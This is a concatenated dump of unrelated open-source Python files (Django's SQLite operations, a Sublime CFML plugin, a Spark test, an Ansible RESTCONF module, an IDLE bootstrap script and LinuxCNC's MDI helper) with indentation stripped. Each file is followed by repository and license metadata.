return (limit // len(fields)) if len(fields) > 0 else len(objs)
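# Worked example (illustrative comment, not part of Django): a model with
# three concrete fields yields 999 // 3 == 333 objects per batch, while a
# single-field insert is capped at 500 by SQLITE_MAX_COMPOUND_SELECT.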
def check_expression_support(self, expression):
bad_fields = (fields.DateField, fields.DateTimeField, fields.TimeField)
bad_aggregates = (aggregates.Sum, aggregates.Avg, aggregates.Variance, aggregates.StdDev)
if isinstance(expression, bad_aggregates):
for expr in expression.get_source_expressions():
try:
output_field = expr.output_field
if isinstance(output_field, bad_fields):
raise NotImplementedError(
'You cannot use Sum, Avg, StdDev, and Variance '
'aggregations on date/time fields in sqlite3 '
'since date/time is saved as text.'
)
except FieldError:
# Not every subexpression has an output_field which is fine
# to ignore.
pass
def date_extract_sql(self, lookup_type, field_name):
# sqlite doesn't support extract, so we fake it with the user-defined
# function django_date_extract that's registered in connect(). Note that
# single quotes are used because this is a string (and could otherwise
# cause a collision with a field name).
return "django_date_extract('%s', %s)" % (lookup_type.lower(), field_name)
def date_interval_sql(self, timedelta):
return "'%s'" % duration_string(timedelta), []
def format_for_duration_arithmetic(self, sql):
"""Do nothing here, we will handle it in the custom function."""
return sql
def date_trunc_sql(self, lookup_type, field_name):
# sqlite doesn't support DATE_TRUNC, so we fake it with a user-defined
# function django_date_trunc that's registered in connect(). Note that
# single quotes are used because this is a string (and could otherwise
# cause a collision with a field name).
return "django_date_trunc('%s', %s)" % (lookup_type.lower(), field_name)
def _require_pytz(self):
if settings.USE_TZ and pytz is None:
raise ImproperlyConfigured("This query requires pytz, but it isn't installed.")
def datetime_cast_date_sql(self, field_name, tzname):
self._require_pytz()
return "django_datetime_cast_date(%s, %%s)" % field_name, [tzname]
def datetime_extract_sql(self, lookup_type, field_name, tzname):
# Same comment as in date_extract_sql.
self._require_pytz()
return "django_datetime_extract('%s', %s, %%s)" % (
lookup_type.lower(), field_name), [tzname]
def datetime_trunc_sql(self, lookup_type, field_name, tzname):
# Same comment as in date_trunc_sql.
self._require_pytz()
return "django_datetime_trunc('%s', %s, %%s)" % (
lookup_type.lower(), field_name), [tzname]
def time_extract_sql(self, lookup_type, field_name):
# sqlite doesn't support extract, so we fake it with the user-defined
# function django_time_extract that's registered in connect(). Note that
# single quotes are used because this is a string (and could otherwise
# cause a collision with a field name).
return "django_time_extract('%s', %s)" % (lookup_type.lower(), field_name)
def drop_foreignkey_sql(self):
return ""
def pk_default_value(self):
return "NULL"
def quote_name(self, name):
if name.startswith('"') and name.endswith('"'):
return name # Quoting once is enough.
return '"%s"' % name
def no_limit_value(self):
return -1
def sql_flush(self, style, tables, sequences, allow_cascade=False):
# NB: The generated SQL below is specific to SQLite
# Note: The DELETE FROM... SQL generated below works for SQLite databases
# because constraints don't exist
sql = ['%s %s %s;' % (
style.SQL_KEYWORD('DELETE'),
style.SQL_KEYWORD('FROM'),
style.SQL_FIELD(self.quote_name(table))
) for table in tables]
# Note: No requirement for reset of auto-incremented indices (cf. other
# sql_flush() implementations). Just return SQL at this point
return sql
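# Illustrative sketch (not part of Django): for tables ['app_foo', 'app_bar']
# this returns ['DELETE FROM "app_foo";', 'DELETE FROM "app_bar";'], modulo
# any terminal colorization applied by the style functions.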
def adapt_datetimefield_value(self, value):
if value is None:
return None
# SQLite doesn't support tz-aware datetimes
if timezone.is_aware(value):
if settings.USE_TZ:
value = timezone.make_naive(value, self.connection.timezone)
else:
raise ValueError("SQLite backend does not support timezone-aware datetimes when USE_TZ is False.")
return six.text_type(value)
def adapt_timefield_value(self, value):
if value is None:
return None
# SQLite doesn't support tz-aware datetimes
if timezone.is_aware(value):
raise ValueError("SQLite backend does not support timezone-aware times.")
return six.text_type(value)
def get_db_converters(self, expression):
converters = super(DatabaseOperations, self).get_db_converters(expression)
internal_type = expression.output_field.get_internal_type()
if internal_type == 'DateTimeField':
converters.append(self.convert_datetimefield_value)
elif internal_type == 'DateField':
converters.append(self.convert_datefield_value)
elif internal_type == 'TimeField':
converters.append(self.convert_timefield_value)
elif internal_type == 'DecimalField':
converters.append(self.convert_decimalfield_value)
elif internal_type == 'UUIDField':
converters.append(self.convert_uuidfield_value)
return converters
def convert_datetimefield_value(self, value, expression, connection, context):
if value is not None:
if not isinstance(value, datetime.datetime):
value = parse_datetime(value)
if settings.USE_TZ:
value = timezone.make_aware(value, self.connection.timezone)
return value
def convert_datefield_value(self, value, expression, connection, context):
if value is not None:
if not isinstance(value, datetime.date):
value = parse_date(value)
return value
def convert_timefield_value(self, value, expression, connection, context):
if value is not None:
if not isinstance(value, datetime.time):
value = parse_time(value)
return value
def convert_decimalfield_value(self, value, expression, connection, context):
if value is not None:
value = expression.output_field.format_number(value)
value = backend_utils.typecast_decimal(value)
return value
def convert_uuidfield_value(self, value, expression, connection, context):
if value is not None:
value = uuid.UUID(value)
return value
def bulk_insert_sql(self, fields, num_values):
res = []
res.append("SELECT %s" % ", ".join(
"%%s AS %s" % self.quote_name(f.column) for f in fields
))
res.extend(["UNION ALL SELECT %s" % ", ".join(["%s"] * len(fields))] * (num_values - 1))
return " ".join(res)
def combine_expression(self, connector, sub_expressions):
# SQLite doesn't have a power function, so we fake it with a
# user-defined function django_power that's registered in connect().
if connector == '^':
return 'django_power(%s)' % ','.join(sub_expressions)
return super(DatabaseOperations, self).combine_expression(connector, sub_expressions)
def combine_duration_expression(self, connector, sub_expressions):
if connector not in ['+', '-']:
raise utils.DatabaseError('Invalid connector for timedelta: %s.' % connector)
fn_params = ["'%s'" % connector] + sub_expressions
if len(fn_params) > 3:
raise ValueError('Too many params for timedelta operations.')
return "django_format_dtdelta(%s)" % ', '.join(fn_params)
def integer_field_range(self, internal_type):
# SQLite doesn't enforce any integer constraints
return (None, None)
| bsd-3-clause |
thomasrotter/sublimetext-cfml | cfml_plugin.py | 1 | 3757 | import sublime
import sublime_plugin
from HTML.html_completions import HtmlTagCompletions
from .src import command_list, completions, events, utils, _plugin_loaded
for command in command_list:
globals()[command.__name__] = command
def plugin_loaded():
_plugin_loaded()
class CfmlEventListener(sublime_plugin.EventListener):
def on_load_async(self, view):
events.trigger("on_load_async", view)
def on_close(self, view):
events.trigger("on_close", view)
def on_modified_async(self, view):
events.trigger("on_modified_async", view)
def on_post_save_async(self, view):
if not view.file_name():
print(
"CFML: file was saved and closed - it is not possible to determine the file path."
)
return
events.trigger("on_post_save_async", view)
def on_post_text_command(self, view, command_name, args):
if command_name == "commit_completion":
pos = view.sel()[0].begin()
if view.match_selector(
pos,
"meta.tag.cfml -source.cfml.script, meta.tag.script.cfml, meta.tag.script.cf.cfml, meta.class.declaration.cfml -meta.class.inheritance.cfml",
):
if view.substr(pos - 1) in [" ", '"', "'", "="]:
view.run_command("auto_complete", {"api_completions_only": True})
elif view.substr(pos) == '"':
# an attribute completion was most likely just inserted
# advance cursor past double quote character
view.run_command("move", {"by": "characters", "forward": True})
if view.substr(pos - 1) == ":" and view.match_selector(
pos - 1, "meta.tag.custom.cfml -source.cfml.script"
):
view.run_command("auto_complete", {"api_completions_only": True})
if view.substr(pos - 1) == "." and view.match_selector(
pos - 1,
"meta.function-call.support.createcomponent.cfml string.quoted, entity.other.inherited-class.cfml, meta.instance.constructor.cfml",
):
view.run_command("auto_complete", {"api_completions_only": True})
def on_post_window_command(self, window, command_name, args):
events.trigger("on_post_window_command", window, command_name, args)
def on_query_completions(self, view, prefix, locations):
if not view.match_selector(locations[0], "embedding.cfml"):
return None
return completions.get_completions(view, locations[0], prefix)
def on_hover(self, view, point, hover_zone):
if hover_zone != sublime.HOVER_TEXT:
return
if not view.match_selector(point, "embedding.cfml"):
return
view.run_command(
"cfml_inline_documentation", {"pt": point, "doc_type": "hover_doc"}
)
class CustomHtmlTagCompletions(HtmlTagCompletions):
"""
There is no text.html scope in <cffunction> bodies, so this
allows the HTML completions to still function there
"""
def on_query_completions(self, view, prefix, locations):
if not utils.get_setting("html_completions_in_tag_components"):
return None
# Only trigger within CFML tag component functions
selector = "meta.class.body.tag.cfml meta.function.body.tag.cfml -source.cfml.script -source.sql"
if not view.match_selector(locations[0], selector):
return None
# check if we are inside a tag
is_inside_tag = view.match_selector(
locations[0], "meta.tag - punctuation.definition.tag.begin"
)
return self.get_completions(view, prefix, locations, is_inside_tag)
| mit |
samklr/spark-testing-base | python/sparktestingbase/test/helloworld_test.py | 8 | 1219 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Simple test example"""
import unittest2
from sparktestingbase.testcase import SparkTestingBaseTestCase
class HelloWorldTest(SparkTestingBaseTestCase):
"""Simple hell world example test."""
def test_basic(self):
"""Test a parallelize & collect."""
input = ["hello world"]
rdd = self.sc.parallelize(input)
result = rdd.collect()
assert result == input
if __name__ == "__main__":
unittest2.main()
| apache-2.0 |
pilou-/ansible | lib/ansible/modules/network/restconf/restconf_get.py | 47 | 3174 | #!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = """
---
module: restconf_get
version_added: "2.8"
author: "Ganesh Nalawade (@ganeshrn)"
short_description: Fetch configuration/state data from RESTCONF enabled devices.
description:
- RESTCONF is a standard mechanism that allows web applications to access the
configuration data and state data developed and standardized by
the IETF. It is documented in RFC 8040.
- This module allows the user to fetch configuration and state data from RESTCONF
enabled devices.
options:
path:
description:
- URI being used to execute API calls.
required: true
content:
description:
- The C(content) is a query parameter that controls how descendant nodes of the
requested data nodes in C(path) will be processed in the reply. If value is
I(config) return only configuration descendant data nodes of value in C(path).
If value is I(nonconfig) return only non-configuration descendant data nodes
of value in C(path). If value is I(all) return all descendant data nodes of
value in C(path).
required: false
choices: ['config', 'nonconfig', 'all']
output:
description:
- The output format of the response received.
required: false
default: json
choices: ['json', 'xml']
"""
EXAMPLES = """
- name: get l3vpn services
restconf_get:
path: /config/ietf-l3vpn-svc:l3vpn-svc/vpn-services
"""
RETURN = """
response:
description: A dictionary representing a JSON-formatted response
returned: when the device response is valid JSON
type: dict
sample: |
{
"vpn-services": {
"vpn-service": [
{
"customer-name": "red",
"vpn-id": "blue_vpn1",
"vpn-service-topology": "ietf-l3vpn-svc:any-to-any"
}
]
}
}
"""
from ansible.module_utils._text import to_text
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import ConnectionError
from ansible.module_utils.network.restconf import restconf
def main():
"""entry point for module execution
"""
argument_spec = dict(
path=dict(required=True),
content=dict(choices=['config', 'nonconfig', 'all']),
output=dict(choices=['json', 'xml'], default='json'),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True
)
result = {'changed': False}
try:
response = restconf.get(module, **module.params)
except ConnectionError as exc:
module.fail_json(msg=to_text(exc), code=exc.code)
result.update({
'response': response,
})
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
yawnosnorous/python-for-android | python3-alpha/python3-src/Mac/IDLE/IDLE.app/Contents/Resources/idlemain.py | 71 | 2786 | """
Bootstrap script for IDLE as an application bundle.
"""
import sys, os
# Change the current directory to the user's home directory; that way we'll get
# a more useful default location in the open/save dialogs.
os.chdir(os.path.expanduser('~/Documents'))
# Make sure sys.executable points to the python interpreter inside the
# framework, instead of at the helper executable inside the application
# bundle (the latter works, but doesn't allow access to the window server)
#
# .../IDLE.app/
# Contents/
# MacOS/
# IDLE (a python script)
# Python{-32} (symlink)
# Resources/
# idlemain.py (this module)
# ...
#
# ../IDLE.app/Contents/MacOS/Python{-32} is symlinked to
# ..Library/Frameworks/Python.framework/Versions/m.n
# /Resources/Python.app/Contents/MacOS/Python{-32}
# which is the Python interpreter executable
#
# The flow of control is as follows:
# 1. IDLE.app is launched which starts python running the IDLE script
# 2. IDLE script exports
# PYTHONEXECUTABLE = .../IDLE.app/Contents/MacOS/Python{-32}
# (the symlink to the framework python)
# 3. IDLE script alters sys.argv and uses os.execve to replace itself with
# idlemain.py running under the symlinked python.
# This is the magic step.
# 4. During interpreter initialization, because PYTHONEXECUTABLE is defined,
# sys.executable may get set to an unuseful value.
#
# (Note that the IDLE script and the setting of PYTHONEXECUTABLE is
# generated automatically by bundlebuilder in the Python 2.x build.
# Also, IDLE invoked via command line, i.e. bin/idle, bypasses all of
# this.)
#
# Now fix up the execution environment before importing idlelib.
# Reset sys.executable to its normal value, the actual path of
# the interpreter in the framework, by following the symlink
# exported in PYTHONEXECUTABLE.
pyex = os.environ['PYTHONEXECUTABLE']
sys.executable = os.path.join(os.path.dirname(pyex), os.readlink(pyex))
# Remove any sys.path entries for the Resources dir in the IDLE.app bundle.
p = pyex.partition('.app')
if p[2].startswith('/Contents/MacOS/Python'):
sys.path = [value for value in sys.path if
value.partition('.app') != (p[0], p[1], '/Contents/Resources')]
# Unexport PYTHONEXECUTABLE so that the other Python processes started
# by IDLE have a normal sys.executable.
del os.environ['PYTHONEXECUTABLE']
# Look for the -psn argument that the launcher adds and remove it, it will
# only confuse the IDLE startup code.
for idx, value in enumerate(sys.argv):
if value.startswith('-psn_'):
del sys.argv[idx]
break
# Now it is safe to import idlelib.
from idlelib.PyShell import main
if __name__ == '__main__':
main()
| apache-2.0 |
ianmcmahon/linuxcnc-mirror | src/emc/usr_intf/gscreen/mdi.py | 36 | 13854 | # Touchy is Copyright (c) 2009 Chris Radek <chris@timeguy.com>
#
# Touchy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# Touchy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# self.mcodes = (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 30, 48, 49, 50, 51,
# 52, 53, 60, 61, 62, 63, 64, 65, 66, 67, 68)
#
# self.gcodes = (0, 10, 20, 30, 40, 50, 51, 52, 53, 70, 80, 100,
# 170, 171, 180, 181, 190, 191, 200, 210, 280, 281,
# 300, 301, 330, 331, 382, 383, 384, 385, 400, 410,
# 411, 420, 421, 430, 431, 490, 530, 540, 550, 560,
# 570, 580, 590, 591, 592, 593, 610, 611, 640, 730,
# 760, 800, 810, 820, 830, 840, 850, 860, 870, 880,
# 890, 900, 901, 910, 911, 920, 921, 922, 923, 930,
# 940, 950, 960, 970, 980, 990)
class mdi:
def __init__(self, emc):
self.clear()
self.emc = emc
self.emcstat = emc.stat()
self.emccommand = emc.command()
self.emcstat.poll()
am = self.emcstat.axis_mask
self.axes = []
self.polar = 0
axisnames = ['X', 'Y', 'Z', 'A', 'B', 'C', 'U', 'V', 'W']
for i in range(9):
if am & (1<<i):
self.axes.append(axisnames[i])
self.gcode = 'M2'
self.codes = {
'M3' : [_('Spindle CW'), 'S'],
'M4' : [_('Spindle CCW'), 'S'],
'M6' : [_('Tool change'), 'T'],
'M66' : [_('Input control'), 'P', 'E', 'L', 'Q'],
# 'A' means 'the axes'
'G0' : [_('Straight rapid'), 'A'],
'G00' : [_('Straight rapid'), 'A'],
'G1' : [_('Straight feed'), 'A', 'F'],
'G01' : [_('Straight feed'), 'A', 'F'],
'G2' : [_('Arc CW'), 'A', 'I', 'J', 'K', 'R', 'F'],
'G02' : [_('Arc CW'), 'A', 'I', 'J', 'K', 'R', 'F'],
'G3' : [_('Arc CCW'), 'A', 'I', 'J', 'K', 'R', 'F'],
'G03' : [_('Arc CCW'), 'A', 'I', 'J', 'K', 'R', 'F'],
'G4' : [_('Dwell'), 'P'],
'G04' : [_('Dwell'), 'P'],
'G10' : [_('Setup'), 'L', 'P', 'A', 'Q', 'R'],
'G33' : [_('Spindle synchronized feed'), 'A', 'K'],
'G33.1' : [_('Rigid tap'), 'Z', 'K'],
'G38.2' : [_('Probe'), 'A', 'F'],
'G38.3' : [_('Probe'), 'A', 'F'],
'G38.4' : [_('Probe'), 'A', 'F'],
'G38.5' : [_('Probe'), 'A', 'F'],
'G41' : [_('Radius compensation left'), 'D'],
'G42' : [_('Radius compensation right'), 'D'],
'G41.1' : [_('Radius compensation left, immediate'), 'D', 'L'],
'G42.1' : [_('Radius compensation right, immediate'), 'D', 'L'],
'G43' : [_('Tool length offset'), 'H'],
'G43.1' : [_('Tool length offset immediate'), 'I', 'K'],
'G53' : [_('Motion in unoffset coordinates'), 'G', 'A', 'F'],
'G64' : [_('Continuous mode'), 'P'],
'G76' : [_('Thread'), 'Z', 'P', 'I', 'J', 'K', 'R', 'Q', 'H', 'E', 'L'],
'G81' : [_('Drill'), 'A', 'R', 'L', 'F'],
'G82' : [_('Drill with dwell'), 'A', 'R', 'L', 'P', 'F'],
'G83' : [_('Peck drill'), 'A', 'R', 'L', 'Q', 'F'],
'G73' : [_('Chip-break drill'), 'A', 'R', 'L', 'Q', 'F'],
'G85' : [_('Bore'), 'A', 'R', 'L', 'F'],
'G89' : [_('Bore with dwell'), 'A', 'R', 'L', 'P', 'F'],
'G92' : [_('Offset all coordinate systems'), 'A'],
'G96' : [_('CSS Mode'), 'S', 'D'],
}
self.ocodes = []
def add_macros(self, macros):
for m in macros:
words = m.split()
call = "O<%s> call" % words[0]
args = [''] + [w + ' ' for w in words[1:]]
self.ocodes.append(call)
self.codes[call] = args
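# Worked example (illustrative, not in the original source): add_macros turns
# an INI-style macro line into an O-word call plus its argument slots.
#
#     self.add_macros(['probe xmax ymax'])
#     # self.ocodes                 == ['O<probe> call']
#     # self.codes['O<probe> call'] == ['', 'xmax ', 'ymax ']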
def get_description(self, gcode):
return self.codes[gcode][0]
def get_words(self, gcode):
self.gcode = gcode
if gcode[0] == 'M' and gcode.find(".") == -1 and int(gcode[1:]) >= 100 and int(gcode[1:]) <= 199:
return ['P', 'Q']
if gcode not in self.codes:
return []
# strip description
words = self.codes[gcode][1:]
# replace A with the real axis names
if 'A' in words:
i = words.index('A')
words = words[:i] + self.axes + words[i+1:]
if self.polar and 'X' in self.axes and 'Y' in self.axes:
words[self.axes.index('X')] = '@'
words[self.axes.index('Y')] = '^'
return words
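# Illustrative sketch (not in the original source): on a three-axis XYZ
# machine get_words('G1') expands the 'A' placeholder to the live axis
# letters, returning ['X', 'Y', 'Z', 'F']; with polar mode enabled the X and
# Y slots become '@' (radius) and '^' (angle).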
def clear(self):
self.words = {}
def set_word(self, word, value):
self.words[word] = value
def set_polar(self, p):
self.polar = p;
def issue(self):
m = self.gcode
if m.lower().startswith('o'):
codes = self.codes[m]
for code in self.codes[m][1:]:
v = self.words[code] or "0"
m = m + " [%s]" % v
else:
w = [i for i in self.words if len(self.words.get(i)) > 0]
if '@' in w:
m += '@' + self.words.get('@')
w.remove('@')
if '^' in w:
m += '^' + self.words.get('^')
w.remove('^')
for i in w:
if len(self.words.get(i)) > 0:
m += i + self.words.get(i)
self.emcstat.poll()
if self.emcstat.task_mode != self.emc.MODE_MDI:
self.emccommand.mode(self.emc.MODE_MDI)
self.emccommand.wait_complete()
self.emccommand.mdi(m)
def set_tool_touchoff(self,tool,axis,value):
m = "G10 L10 P%d %s%f"%(tool,axis,value)
self.emcstat.poll()
if self.emcstat.task_mode != self.emc.MODE_MDI:
self.emccommand.mode(self.emc.MODE_MDI)
self.emccommand.wait_complete()
self.emccommand.mdi(m)
self.emccommand.wait_complete()
self.emccommand.mdi("g43")
def set_axis_origin(self,axis,value):
m = "G10 L20 P0 %s%f"%(axis,value)
self.emcstat.poll()
if self.emcstat.task_mode != self.emc.MODE_MDI:
self.emccommand.mode(self.emc.MODE_MDI)
self.emccommand.wait_complete()
self.emccommand.mdi(m)
def go_to_position(self,axis,position,feedrate):
m = "G1 %s %f F%f"%(axis,position,feedrate)
self.emcstat.poll()
if self.emcstat.task_mode != self.emc.MODE_MDI:
self.emccommand.mode(self.emc.MODE_MDI)
self.emccommand.wait_complete()
self.emccommand.mdi(m)
def set_spindle_speed(self,value):
m = "s %f"%(value)
self.emcstat.poll()
if self.emcstat.task_mode != self.emc.MODE_MDI:
self.emccommand.mode(self.emc.MODE_MDI)
self.emccommand.wait_complete()
self.emccommand.mdi(m)
def set_user_system(self,value):
m = "g %f"%(value)
self.emcstat.poll()
if self.emcstat.task_mode != self.emc.MODE_MDI:
self.emccommand.mode(self.emc.MODE_MDI)
self.emccommand.wait_complete()
self.emccommand.mdi(m)
def index_tool(self,toolnumber):
m = "T %f M6"%(toolnumber)
self.emcstat.poll()
if self.emcstat.task_mode != self.emc.MODE_MDI:
self.emccommand.mode(self.emc.MODE_MDI)
self.emccommand.wait_complete()
self.emccommand.mdi("m6 T %f"%(toolnumber))
self.emccommand.mdi("g43 h%f"%(toolnumber))
def arbitrary_mdi(self,command):
if self.emcstat.task_mode != self.emc.MODE_MDI:
self.emccommand.mode(self.emc.MODE_MDI)
self.emccommand.wait_complete()
self.emccommand.mdi(command)
class mdi_control:
def __init__(self, gtk, emc, labels, eventboxes):
self.labels = labels
self.eventboxes = eventboxes
self.numlabels = len(labels)
self.numwords = 1
self.selected = 0
self.gtk = gtk
self.mdi = mdi(emc)
#for i in range(self.numlabels):
# self.not_editing(i)
#self.editing(self.selected)
#self.set_text("G")
def mdi_is_reading(self):
self.mdi.emcstat.poll()
if self.mdi.emcstat.interp_state == self.mdi.emc.INTERP_READING:
return True
return False
def set_mdi_mode(self):
self.mdi.emcstat.poll()
if self.mdi.emcstat.task_mode != self.mdi.emc.MODE_MDI:
self.mdi.emccommand.mode(self.mdi.emc.MODE_MDI)
self.mdi.emccommand.wait_complete()
def set_axis(self,axis,value):
premode = self.mdi.emcstat.task_mode
self.mdi.set_axis_origin(axis,value)
self.mdi.emccommand.mode(premode)
self.mdi.emccommand.wait_complete()
def touchoff(self,tool,axis,value):
premode = self.mdi.emcstat.task_mode
self.mdi.set_tool_touchoff(tool,axis,value)
self.mdi.emccommand.mode(premode)
self.mdi.emccommand.wait_complete()
def set_spindle_speed(self,value):
self.mdi.set_spindle_speed(value)
def go_to_position(self,axis,position,feedrate):
self.mdi.go_to_position(axis,position,feedrate)
def set_user_system(self,system):
print "set user system to :G",system
premode = self.mdi.emcstat.task_mode
self.mdi.set_user_system(system)
self.mdi.emccommand.mode(premode)
self.mdi.emccommand.wait_complete()
def index_tool(self,toolnumber):
print "set tool number to :T",toolnumber
premode = self.mdi.emcstat.task_mode
self.mdi.index_tool(toolnumber)
#self.mdi.emccommand.mode(premode)
#self.mdi.emccommand.wait_complete()
def user_command(self,command):
premode = self.mdi.emcstat.task_mode
self.mdi.arbitrary_mdi(command)
#self.mdi.emccommand.mode(premode)
#self.mdi.emccommand.wait_complete()
def not_editing(self, n):
e = self.eventboxes[n]
e.modify_bg(self.gtk.STATE_NORMAL, self.gtk.gdk.color_parse("#ccc"))
def editing(self, n):
self.not_editing(self.selected)
self.selected = n
e = self.eventboxes[n]
e.modify_bg(self.gtk.STATE_NORMAL, self.gtk.gdk.color_parse("#fff"))
def get_text(self):
w = self.labels[self.selected]
return w.get_text()
def set_text(self, t, n = -1):
if n == -1: n = self.selected
w = self.labels[n]
w.set_text(t)
if n > 0:
head = t.rstrip("0123456789.-")
tail = t[len(head):]
self.mdi.set_word(head, tail)
if len(t) < 2:
w.set_alignment(1.0, 0.5)
else:
w.set_alignment(0.0, 0.5)
def clear(self, b):
t = self.get_text()
self.set_text(t.rstrip("0123456789.-"))
def back(self, b):
t = self.get_text()
if t[-1:] in "0123456789.-":
self.set_text(t[:-1])
def fill_out(self):
if self.selected == 0:
w = self.mdi.get_words(self.get_text())
self.numwords = len(w)
for i in range(1,self.numlabels):
if i <= len(w):
self.set_text(w[i-1], i)
else:
self.set_text("", i)
def next(self, b):
self.fill_out();
if self.numwords > 0:
self.editing(max(1,(self.selected+1) % (self.numwords+1)))
def ok(self, b):
self.fill_out();
self.mdi.issue()
def decimal(self, b):
t = self.get_text()
if t.find(".") == -1:
self.set_text(t + ".")
def minus(self, b):
t = self.get_text()
if self.selected > 0:
head = t.rstrip("0123456789.-")
tail = t[len(head):]
if tail.find("-") == -1:
self.set_text(head + "-" + tail)
else:
self.set_text(head + tail[1:])
def keypad(self, b):
t = self.get_text()
num = b.get_name()
self.set_text(t + num)
def gp(self, b):
self.g(b, "G", 1)
def g(self, b, code="G", polar=0):
self.mdi.set_polar(polar)
self.set_text(code, 0)
for i in range(1, self.numlabels):
self.set_text("", i)
self.editing(0)
self.mdi.clear()
def m(self, b):
self.g(b, "M")
def t(self, b):
self.g(b, "T")
def o(self, b):
old_code = self.labels[0].get_text()
ocodes = self.mdi.ocodes
if old_code in ocodes:
j = (ocodes.index(old_code) + 1) % len(ocodes)
else:
j = 0
self.g(b, ocodes[j])
self.next(b)
def select(self, eventbox, event):
n = int(eventbox.get_name()[12:])
if self.selected == 0:
self.fill_out()
if n <= self.numwords:
self.editing(n)
def set_tool(self, tool, g10l11):
self.g(0)
self.set_text("G10", 0)
self.next(0)
if g10l11:
self.set_text("L11", 1)
else:
self.set_text("L10", 1)
self.next(0)
self.set_text("P%d" % tool, 2)
self.next(0)
self.next(0)
self.next(0)
def set_origin(self, system):
self.g(0)
self.set_text("G10", 0)
self.next(0)
self.set_text("L20", 1)
self.next(0)
self.set_text("P%d" % system, 2)
self.next(0)
| lgpl-2.1 |